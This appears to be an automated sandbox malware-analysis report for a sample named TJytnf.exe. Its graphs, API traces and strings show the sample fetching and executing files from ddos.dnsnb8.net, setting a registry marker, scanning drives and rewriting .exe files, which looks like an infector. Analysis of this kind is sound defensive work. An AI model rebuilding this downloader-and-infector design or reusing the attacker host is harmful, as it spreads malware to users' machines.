1340->1338 1341->1334 1342 f762fb 1341->1342

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00F76076 22 Function_00F766C8 0->22 1 Function_00F71DF6 2 Function_00F71973 18 Function_00F7185B 2->18 3 Function_00F76CF2 7 Function_00F76CF8 3->7 4 Function_00F72CF0 5 Function_00F72B7D 9 Function_00F729E2 5->9 6 Function_00F71AF9 27 Function_00F71638 6->27 8 Function_00F76B63 23 Function_00F76834 8->23 25 Function_00F769B0 8->25 29 Function_00F767A4 8->29 26 Function_00F728B8 9->26 10 Function_00F714E1 10->6 10->27 11 Function_00F72361 38 Function_00F72D9B 11->38 12 Function_00F72D60 13 Function_00F71E6E 13->1 13->6 13->12 14 Function_00F71C68 13->14 13->18 30 Function_00F71915 13->30 13->38 45 Function_00F71C81 13->45 52 Function_00F71D8A 13->52 53 Function_00F71B8A 13->53 15 Function_00F717D0 16 Function_00F7615D 16->22 17 Function_00F7235D 19 Function_00F72845 20 Function_00F7274A 19->20 32 Function_00F72692 19->32 36 Function_00F7239D 19->36 20->2 20->18 21 Function_00F72C48 21->2 51 Function_00F72B8C 21->51 42 Function_00F76A84 22->42 43 Function_00F76B02 22->43 48 Function_00F76D00 22->48 24 Function_00F76734 24->42 24->43 24->48 26->9 26->13 26->32 26->36 27->15 27->21 35 Function_00F7139F 27->35 39 Function_00F71099 27->39 41 Function_00F71718 27->41 46 Function_00F71581 27->46 28 Function_00F765A6 31 Function_00F76014 33 Function_00F76012 34 Function_00F7119F 35->34 40 Function_00F71319 35->40 50 Function_00F7120E 35->50 36->9 36->30 37 Function_00F7189D 36->37 39->18 47 Function_00F71000 39->47 41->4 42->3 49 Function_00F7680F 42->49 43->8 44 Function_00F76001 54 Function_00F7600A 44->54 46->18 47->15 48->3 48->8 48->25 51->5 51->19 53->18

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                          • String ID: %s*$C:\$Documents and Settings
                          • API String ID: 2826467728-110786608
                          • Opcode ID: 732de9b38b6035bf5a649788f7dbf92902332f7b3a4165f93e0ca9d4f2a66011
                          • Instruction ID: 7ad9a520f6249b89c9635afdd885b049970a922b1004d803529b5168baaf5b93
                          • Opcode Fuzzy Hash: 732de9b38b6035bf5a649788f7dbf92902332f7b3a4165f93e0ca9d4f2a66011
                          • Instruction Fuzzy Hash: E44173B2804349BFD761DBA0DC49DEB77ACEB84315F04482BF94CC2111E634D658ABA3

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 172 f71099-f710b4 173 f710ba-f710c7 172->173 174 f71199-f7119c 172->174 175 f710c8-f710d4 173->175 176 f71184-f71190 175->176 177 f710da 175->177 176->175 179 f71196-f71198 176->179 178 f71113-f71162 call f7185b wsprintfA * 2 URLDownloadToFileA 177->178 182 f710dc-f7110d call f71000 WinExec lstrlen 178->182 183 f71168-f71182 lstrlen Sleep 178->183 179->174 182->178 182->179 183->176 183->178
                          APIs
                            • Part of subcall function 00F7185B: GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
                            • Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71878
                            • Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71880
                            • Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71890
                            • Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71894
                          • WinExec.KERNEL32(?,00000005), ref: 00F710F1
                          • lstrlen.KERNEL32(00F74748), ref: 00F710FA
                          • wsprintfA.USER32 ref: 00F7112A
                          • wsprintfA.USER32 ref: 00F71143
                          • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00F7115B
                          • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00F71169
                          • Sleep.KERNEL32 ref: 00F71179
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                          • String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                          • API String ID: 1280626985-4120842960
                          • Opcode ID: ceb98667e9c695ac20f3d4c9f27e13d14bc69a2eb33f38a5da4ca8f554b7b5f7
                          • Instruction ID: b68d37de45b428cf15a5e9b6be228534d60cc7a76a9c8ae45c63329fdd69f2d9
                          • Opcode Fuzzy Hash: ceb98667e9c695ac20f3d4c9f27e13d14bc69a2eb33f38a5da4ca8f554b7b5f7
                          • Instruction Fuzzy Hash: 3D214175D0024CBADB119BA4DC45BAFBB7CBB05315F518056E608A2051D774AB88FF53

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 216 f76076-f76079 217 f760e0-f760eb 216->217 218 f7607b-f76080 216->218 221 f760ee-f760f4 217->221 219 f760f7-f760f8 218->219 220 f76082-f76085 218->220 224 f760fe-f76106 219->224 225 f760fa-f760fc call f766c8 219->225 222 f76087 220->222 223 f760f6 220->223 221->223 222->221 228 f76089-f76095 222->228 223->219 226 f76155-f76189 VirtualFree 224->226 227 f76108-f7611d 224->227 225->224 238 f7618c-f76192 226->238 230 f7611f-f76121 227->230 231 f76097-f7609f 228->231 232 f760a1-f760aa 228->232 234 f76123 230->234 235 f76151-f76154 230->235 231->232 236 f760b0-f760c1 VirtualAlloc 232->236 237 f761ba-f761c8 232->237 234->235 241 f76125-f76128 234->241 235->226 242 f760c7-f760cf 236->242 239 f76243-f76251 237->239 240 f761ca-f761d7 237->240 238->242 243 f76198-f761b0 VirtualFree 238->243 248 f76264-f7626f 239->248 249 f76253 239->249 244 f761dd-f761e0 240->244 245 f76134-f7613b 241->245 246 f7612a-f7612e 241->246 242->238 247 f760d5-f760df VirtualAlloc 242->247 243->237 250 f761b2-f761b4 243->250 244->239 252 f761e2-f761f2 244->252 260 f76130-f76132 245->260 261 f7613d-f7614f 245->261 246->245 246->260 247->217 251 f76271-f76276 248->251 255 f76255-f76258 249->255 250->237 257 f7627c-f76289 251->257 258 f76389-f763b1 VirtualProtect 251->258 259 f761f5-f761fe 252->259 255->248 256 f7625a-f76262 255->256 256->255 272 f76292-f76298 257->272 273 f7628b 257->273 264 f763b7-f763ba 258->264 262 f76200-f76203 259->262 263 f7620c-f76219 259->263 260->230 261->230 266 f76205-f76208 262->266 267 f7621b-f76228 262->267 268 f76238-f7623f 263->268 269 f763fc-f763ff VirtualProtect 264->269 270 f763bc-f763c2 264->270 274 f7622a-f76236 266->274 275 f7620a 266->275 267->268 268->259 277 f76241 268->277 271 f76400-f76416 269->271 270->270 276 f763c4 270->276 278 f76420-f76425 271->278 279 f76418-f7641d 271->279 280 f762a2-f762ac 272->280 273->272 274->268 275->268 276->269 281 f763c6-f763cf 276->281 277->244 282 f762b1-f762c8 280->282 283 f762ae 280->283 284 f763d4-f763d8 281->284 285 f763d1 281->285 286 f76373-f76384 282->286 287 f762ce-f762d4 282->287 283->282 288 f763dd-f763e1 284->288 289 f763da 284->289 285->284 286->251 292 f762d6-f762d9 287->292 293 f762da-f762f1 287->293 290 f763e7-f763fa VirtualProtect 288->290 291 f763e3 288->291 289->288 290->264 290->269 291->290 292->293 295 f76365-f7636e 293->295 296 f762f3-f762f9 293->296 295->280 297 f76314-f76326 296->297 298 f762fb-f7630f 296->298 300 f7634c-f76360 297->300 301 f76328-f7634a 297->301 299 f76426-f764c0 298->299 310 f76535-f76537 299->310 311 f764c2 299->311 300->299 301->295 312 f7659a 310->312 313 f76539 310->313 314 f764c5-f764cd 311->314 315 f764f8 311->315 318 f7659b-f7659d 312->318 316 f765b4 313->316 317 f7653b-f76541 313->317 319 f76542-f76545 314->319 320 f764cf-f764d4 314->320 321 f7656c-f7656f 315->321 322 f764fa-f764fe 315->322 328 f765be-f765db 316->328 317->319 323 f76591-f76593 318->323 324 f7659f 318->324 325 f7654d-f76550 319->325 326 f76517-f7651c 320->326 327 f764d6-f764d9 320->327 329 f76572 321->329 322->329 330 f76500 322->330 323->318 333 f76595 323->333 334 f76588-f7658b 324->334 325->328 335 f76552-f76556 325->335 331 f76583-f76587 326->331 332 f7651d-f7651e 326->332 327->325 336 f764db-f764f5 327->336 345 f765dd-f765f6 328->345 338 f76573-f76576 329->338 339 f76522-f76533 330->339 340 f76502 330->340 331->334 332->339 333->312 341 f765a1-f765a3 334->341 342 f7658d-f7658f 334->342 343 f76578-f7657a 335->343 344 f76558-f76569 335->344 336->315 338->343 339->310 340->338 346 f76504-f76513 340->346 342->323 343->345 349 f7657c 343->349 344->321 348 f765f7-f76608 345->348 346->310 347 f76515 346->347 347->326 349->348 350 f7657e-f7657f 349->350 350->331
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00F760BE
                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00F760DF
                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00F76189
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00F761A5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID: kernel32.dll
                          • API String ID: 2087232378-1793498882
                          • Opcode ID: 7b17037aae3aec55d74ed426653549d2269d8f0aa5bcea2a27523279dd2bc4ee
                          • Instruction ID: 663e94ec5c169b05c3d674f65cb3975aab0aa1f94850eeba8082b9895b43c7d7
                          • Opcode Fuzzy Hash: 7b17037aae3aec55d74ed426653549d2269d8f0aa5bcea2a27523279dd2bc4ee
                          • Instruction Fuzzy Hash: 68122672908B859FDB328F64CC45BEA3BB0EF06310F18855ED88DCB693D674A901E756

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 351 f71718-f71733 GetSystemTimeAsFileTime 352 f71735-f71752 SHSetValueA 351->352 353 f71754-f71758 351->353 354 f717c6-f717cd 352->354 353->354 355 f7175a-f71784 SHGetValueA 353->355 355->354 356 f71786-f717b3 call f72cf0 * 2 355->356 356->354 361 f717b5 356->361 362 f717b7-f717bd 361->362 363 f717bf 361->363 362->354 362->363 363->354
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71729
                          • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00F7174C
                          • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00F7177C
                          • __aulldiv.LIBCMT ref: 00F71796
                          • __aulldiv.LIBCMT ref: 00F717A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: TimeValue__aulldiv$FileSystem
                          • String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$SOFTWARE\GTplus$Time
                          • API String ID: 541852442-2654363020
                          • Opcode ID: 49354ff6e2f3b3dfe51e1574d65d7cac5c89e24330acebe67d87056aed850aa2
                          • Instruction ID: da6f73a4561c405a92c058200136f68b26e95123b693fc212bd3cd3548dba521
                          • Opcode Fuzzy Hash: 49354ff6e2f3b3dfe51e1574d65d7cac5c89e24330acebe67d87056aed850aa2
                          • Instruction Fuzzy Hash: CB116372E00209BBDB149E94CC85FEF7BBCEB44B14F10C516F908A6141D6B5DA49FB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 364 f72b8c-f72bc6 memset GetLogicalDriveStringsA 365 f72c09-f72c28 WaitForMultipleObjects 364->365 366 f72bc8-f72bcc 364->366 367 f72c3c-f72c45 365->367 368 f72c2a-f72c3a CreateThread 365->368 369 f72bce-f72bd0 366->369 370 f72bfa-f72c07 lstrlen 366->370 368->367 369->370 371 f72bd2-f72bdc GetDriveTypeA 369->371 370->365 370->366 371->370 372 f72bde-f72be1 371->372 372->370 373 f72be3-f72bf6 CreateThread 372->373 373->370
                          APIs
                          • memset.MSVCRT ref: 00F72BA6
                          • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00F72BB4
                          • GetDriveTypeA.KERNEL32(?), ref: 00F72BD3
                          • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00F72BEE
                          • lstrlen.KERNEL32(?), ref: 00F72BFB
                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00F72C16
                          • CreateThread.KERNEL32(00000000,00000000,00F72845,00000000,00000000,00000000), ref: 00F72C3A
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                          • String ID:
                          • API String ID: 1073171358-0
                          • Opcode ID: dd4afcf7a72186867942d5677d47b85b7456d969a2bb08ca0051b2b5aa7caa95
                          • Instruction ID: f5005bbcb24d08614f019cbe9d395c22c2677178504950669108e7f0849a4c56
                          • Opcode Fuzzy Hash: dd4afcf7a72186867942d5677d47b85b7456d969a2bb08ca0051b2b5aa7caa95
                          • Instruction Fuzzy Hash: DB2127B180014CBFE7209F689C84DAE7B6CFB44368B10412BF84A92151D7309E86FB63

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 16 f71e6e-f71e95 call f72d60 19 f71e97 call f71d8a 16->19 20 f71e9c-f71eaa call f71df6 16->20 19->20 24 f72332 20->24 25 f71eb0-f71ed9 SetFileAttributesA CreateFileA 20->25 27 f72338-f7233b 24->27 25->24 26 f71edf-f71f28 call f71915 SetFilePointer CreateFileMappingA MapViewOfFile 25->26 26->24 34 f71f2e-f71f39 26->34 29 f72346-f72349 27->29 30 f7233d-f72340 UnmapViewOfFile 27->30 32 f72350-f72354 29->32 33 f7234b-f7234e FindCloseChangeNotification 29->33 30->29 35 f72356-f7235b CloseHandle 32->35 36 f72391-f7239a call f72d9b 32->36 33->32 34->24 37 f71f3f-f71f56 34->37 35->36 37->24 39 f71f5c-f71f64 37->39 39->24 41 f71f6a-f71f70 39->41 41->24 42 f71f76-f71f87 call f71c81 41->42 42->24 45 f71f8d-f71fa7 call f7185b call f71c81 42->45 45->24 50 f71fad-f71fb4 45->50 51 f71fb6-f71fc5 call f71af9 50->51 52 f72024-f72045 50->52 51->52 60 f71fc7-f71fd2 51->60 52->24 53 f7204b-f7204e 52->53 55 f72070-f720f4 call f71af9 * 2 call f71c68 * 2 memset * 2 53->55 56 f72050-f72053 53->56 78 f720f5-f720fe 55->78 58 f72056-f7205a 56->58 58->55 61 f7205c-f72061 58->61 60->24 63 f71fd8-f71fe7 60->63 61->24 64 f72067-f7206e 61->64 66 f71fef-f72006 call f71af9 63->66 67 f71fe9-f71fec 63->67 64->58 73 f72013-f7201e FlushViewOfFile 66->73 74 f72008-f7200e call f71c68 66->74 67->66 73->52 74->73 79 f72130-f72139 78->79 80 f72100-f72114 78->80 83 f7213c-f72142 79->83 81 f72116-f7212a 80->81 82 f7212d-f7212e 80->82 81->82 82->78 84 f72144-f72150 83->84 85 f7215c 83->85 86 f72157-f7215a 84->86 87 f72152-f72154 84->87 88 f7215f-f72162 85->88 86->83 87->86 89 f72164-f72171 88->89 90 f72181-f72184 88->90 91 f72177-f7217e 89->91 92 f7232a-f7232d 89->92 93 f72186 90->93 94 f7218d-f721ba call f71c68 90->94 91->90 92->88 93->94 97 f721d3-f7220b call f71c81 call f71c68 94->97 98 f721bc-f721d0 call f71c68 94->98 105 f7220d-f72218 call f71c68 97->105 106 f7221b-f7221e 97->106 98->97 105->106 108 f72226-f72328 memcpy UnmapViewOfFile FindCloseChangeNotification call f71b8a call f7185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call f71915 FindCloseChangeNotification 106->108 109 f72220-f72223 106->109 108->27 109->108
                          APIs
                          • SetFileAttributesA.KERNEL32(?,00000080,?,00F732B0,00000164,00F72986,?), ref: 00F71EB9
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00F71ECD
                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00F71EF3
                          • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00F71F07
                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00F71F1D
                          • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00F7201E
                          • memset.MSVCRT ref: 00F720D8
                          • memset.MSVCRT ref: 00F720EA
                          • memcpy.MSVCRT ref: 00F7222D
                          • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F72238
                          • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F7224A
                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722C6
                          • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722CB
                          • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722DD
                          • WriteFile.KERNEL32(000000FF,00F74008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F722F7
                          • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F7230D
                          • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00F72322
                          • UnmapViewOfFile.KERNEL32(?,?,00F732B0,00000164,00F72986,?), ref: 00F72340
                          • FindCloseChangeNotification.KERNEL32(?,?,00F732B0,00000164,00F72986,?), ref: 00F7234E
                          • CloseHandle.KERNEL32(000000FF,?,00F732B0,00000164,00F72986,?), ref: 00F72359
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
                          • String ID:
                          • API String ID: 307705342-0
                          • Opcode ID: 699157522cefe6cb34c62771ad83436827ba280f84e1eff385b1c2d908042336
                          • Instruction ID: ef4e0fb5b6c57fee6543d0baa352431aa024770581a4ab9a28f782d4f72ace1b
                          • Opcode Fuzzy Hash: 699157522cefe6cb34c62771ad83436827ba280f84e1eff385b1c2d908042336
                          • Instruction Fuzzy Hash: 3FF17D71900208EFDB61DFA8DC81AADBBB5FF08314F10852AE50DA7661D734AD91EF52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 117 f71973-f7199a PathFileExistsA 118 f71ac7-f71acc 117->118 119 f719a0-f719aa 117->119 121 f71ad0-f71ad5 118->121 122 f71ace 118->122 120 f719af-f719c2 CreateFileA 119->120 125 f719c4-f719d3 Sleep 120->125 126 f71a28-f71a36 GetFileSize 120->126 123 f71ad7-f71ad9 121->123 124 f71af0-f71af6 121->124 122->121 123->124 125->120 127 f719d5-f71a0b call f7185b wsprintfA CopyFileA 125->127 128 f71a87-f71a8b 126->128 129 f71a38-f71a3b 126->129 127->126 143 f71a0d-f71a26 CreateFileA 127->143 131 f71a96-f71a9a 128->131 132 f71a8d-f71a90 FindCloseChangeNotification 128->132 129->128 130 f71a3d-f71a51 VirtualAlloc 129->130 130->128 134 f71a53-f71a57 130->134 135 f71aad-f71ab1 131->135 136 f71a9c 131->136 132->131 138 f71a80 134->138 139 f71a59-f71a6d ReadFile 134->139 141 f71ab3-f71ab6 135->141 142 f71adb-f71ae0 135->142 140 f71aa0-f71aa7 DeleteFileA 136->140 138->128 139->128 144 f71a6f-f71a7e 139->144 140->135 141->118 147 f71ab8-f71ac1 VirtualFree 141->147 145 f71ae7-f71aec 142->145 146 f71ae2-f71ae5 142->146 143->126 148 f71a9e 143->148 144->138 144->139 145->124 149 f71aee 145->149 146->145 147->118 148->140 149->124
                          APIs
                          • PathFileExistsA.SHLWAPI(00F74E5C,00000000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71992
                          • CreateFileA.KERNEL32(00F74E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00F719BA
                          • Sleep.KERNEL32(00000064), ref: 00F719C6
                          • wsprintfA.USER32 ref: 00F719EC
                          • CopyFileA.KERNEL32(00F74E5C,?,00000000), ref: 00F71A00
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F71A1E
                          • GetFileSize.KERNEL32(00F74E5C,00000000), ref: 00F71A2C
                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00F71A46
                          • ReadFile.KERNEL32(00F74E5C,00F74E60,00000000,?,00000000), ref: 00F71A65
                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00F71A90
                          • DeleteFileA.KERNEL32(?), ref: 00F71AA7
                          • VirtualFree.KERNEL32(00F74E60,00000000,00008000), ref: 00F71AC1
                          Strings
                          • C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F7197C
                          • 2, xrefs: 00F719CF
                          • %s%.8X.data, xrefs: 00F719E6
                          • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F719DB
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                          • String ID: %s%.8X.data$2$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
                          • API String ID: 2523042076-290089164
                          • Opcode ID: 08c44949e2870a90b197ace8ef1a9bc9a595dff1d023d119c48b302968db4864
                          • Instruction ID: 6fa200c9742af5149b86c19691adcf988478a2daa9309788556ac667015259ca
                          • Opcode Fuzzy Hash: 08c44949e2870a90b197ace8ef1a9bc9a595dff1d023d119c48b302968db4864
                          • Instruction Fuzzy Hash: 1A517171D01219FFDF109F98CC84AAEBBB9FB04364F10856AF519E2190D3749E98EB52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 150 f728b8-f728ff memset wsprintfA 151 f72905-f7290d 150->151 152 f729db-f729df 150->152 151->152 153 f72913-f72919 151->153 154 f72956-f72965 strrchr 153->154 155 f7291b-f7294c memset wsprintfA call f729e2 153->155 154->152 156 f72967-f72978 lstrcmpiA 154->156 160 f72951 155->160 158 f7297a-f72981 call f71e6e 156->158 159 f72988-f72992 lstrcmpiA 156->159 163 f72986 158->163 159->152 162 f72994-f7299b 159->162 160->152 164 f729ad-f729c9 strstr 162->164 165 f7299d-f729a3 162->165 163->152 167 f729d3-f729d6 call f72692 164->167 168 f729cb-f729d1 call f7239d 164->168 165->164 166 f729a5-f729a7 lstrcpy 165->166 166->164 167->152 168->152
                          APIs
                          • memset.MSVCRT ref: 00F728D3
                          • wsprintfA.USER32 ref: 00F728F7
                          • memset.MSVCRT ref: 00F72925
                          • wsprintfA.USER32 ref: 00F72940
                            • Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72A02
                            • Part of subcall function 00F729E2: wsprintfA.USER32 ref: 00F72A1A
                            • Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72A44
                            • Part of subcall function 00F729E2: lstrlen.KERNEL32(?), ref: 00F72A54
                            • Part of subcall function 00F729E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00F72A6C
                            • Part of subcall function 00F729E2: strrchr.MSVCRT ref: 00F72A7C
                            • Part of subcall function 00F729E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00F72A9F
                            • Part of subcall function 00F729E2: lstrlen.KERNEL32(Documents and Settings), ref: 00F72AAE
                            • Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72AC6
                            • Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72ADA
                            • Part of subcall function 00F729E2: FindFirstFileA.KERNEL32(?,?), ref: 00F72AEF
                            • Part of subcall function 00F729E2: memset.MSVCRT ref: 00F72B13
                          • strrchr.MSVCRT ref: 00F72959
                          • lstrcmpiA.KERNEL32(00000001,exe), ref: 00F72974
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                          • String ID: %s%s$%s\$C:\Users\user~1\AppData\Local\Temp\$exe$rar
                          • API String ID: 3004273771-4092107658
